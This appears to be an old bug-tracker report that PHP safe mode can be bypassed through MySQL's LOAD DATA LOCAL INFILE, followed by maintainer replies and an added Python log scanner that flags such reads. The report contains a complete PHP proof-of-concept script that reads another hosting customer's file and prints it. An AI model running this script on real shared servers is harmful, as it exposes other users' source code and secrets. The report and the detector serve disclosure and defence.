From Bugzilla Helper:
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461)

Description of problem:
By using a flaw in PHP+Mysql query, somebody can bypass safe mode.

Version-Release number of selected component (if applicable):

How reproducible:
Always

Steps to Reproduce:
1. Use the script:

    $host = 'localhost';
    $user = 'root';
    $pass = 'letmein';
    $db = 'teste';
    $filename = '/home/othercliente/myscript.php'; /* File to grab from [local] server */
    $local = true; /* Read from local filesystem */
    $local = $local ? 'LOCAL' : '';
    $sql = array (
        "USE $db",
        'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
        "LOAD DATA $local INFILE '$filename' INTO TABLE $tbl FIELDS " .
        "TERMINATED BY '__THIS_NEVER_HAPPENS__' " .
        "ESCAPED BY '' " .
        "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
        "SELECT a FROM $tbl LIMIT 1"
    );
    Header ('Content-type: text/plain');
    mysql_connect ($host, $user, $pass);
    foreach ($sql as $statement) {
        $q = mysql_query ($statement);
        if ($q == false) die (
            "FAILED: " . $statement . "\n" .
            "REASON: " . mysql_error () . "\n"
        );
        if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
        echo $r [0];
        mysql_free_result ($q);
    }

2. Call the script using wget http://server/script

Actual Results:
You can view the source of the other client

Additional info:

rpm -q php

I need to know which one it is, please.

Cheers,
Phil
=--=

php: 4.0.6-7
php-mysql: 4.0.6-7

It's configured as a module in Apache.

This is not a bug in PHP. This is a potential bug with MySQL, but PHP's safe mode cannot prevent this. PHP can only protect internal PHP functions, and mysql_* use the MySQL client library. I'm moving this to the MySQL component, as it can only be handled there.

This is not a bug in MySQL, it does what you want and it can do. Don't set up unsafe scripts.
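
A detection-side sketch for the technique in this report, added here as an example and not part of the original thread or of PHP or MySQL: it scans logged SQL statements for LOAD DATA [LOCAL] INFILE reading a file outside an expected import directory. The log layout, `ALLOWED_DIRS`, the function names and the sample lines are constructed assumptions.

```python
import posixpath
import re

# Assumption: bulk imports are only ever expected from these directories.
ALLOWED_DIRS = ("/var/lib/mysql-import",)

# LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE 'path'
LOAD_RE = re.compile(
    r"LOAD\s+DATA\s+(?:(?:LOW_PRIORITY|CONCURRENT)\s+)?(?P<local>LOCAL\s+)?"
    r"INFILE\s+(?P<q>['\"])(?P<path>.+?)(?P=q)",
    re.IGNORECASE,
)

def is_allowed(path, allowed=ALLOWED_DIRS):
    """True if the normalised path sits under an allowed import directory."""
    norm = posixpath.normpath(path)  # collapses ../ sequences
    return any(norm == d or norm.startswith(d.rstrip("/") + "/") for d in allowed)

def find_suspicious_loads(lines, allowed=ALLOWED_DIRS):
    """Return (line number, reading side, normalised path) for each
    LOAD DATA statement whose source file is outside the allowed dirs.
    Relative paths are flagged too, since they cannot be vetted here."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOAD_RE.search(line)
        if not m or is_allowed(m.group("path"), allowed):
            continue
        # With LOCAL the client library (here: the PHP process) reads the
        # file; without it the MySQL server process does.
        side = "client" if m.group("local") else "server"
        findings.append((lineno, side, posixpath.normpath(m.group("path"))))
    return findings

# Constructed sample statements in a simplified "<conn id> Query <sql>" layout.
SAMPLE_LOG = [
    "12 Query USE teste",
    "12 Query LOAD DATA LOCAL INFILE '/home/othercliente/myscript.php' "
    "INTO TABLE A1011 FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__'",
    "13 Query LOAD DATA INFILE '/var/lib/mysql-import/orders.csv' INTO TABLE orders",
    "14 Query load data infile '/var/lib/mysql-import/../../../home/othercliente/config.php' into table t",
    "12 Query SELECT a FROM A1011 LIMIT 1",
]

if __name__ == "__main__":
    for lineno, side, path in find_suspicious_loads(SAMPLE_LOG):
        print(f"line {lineno}: {side}-side read of {path}")
```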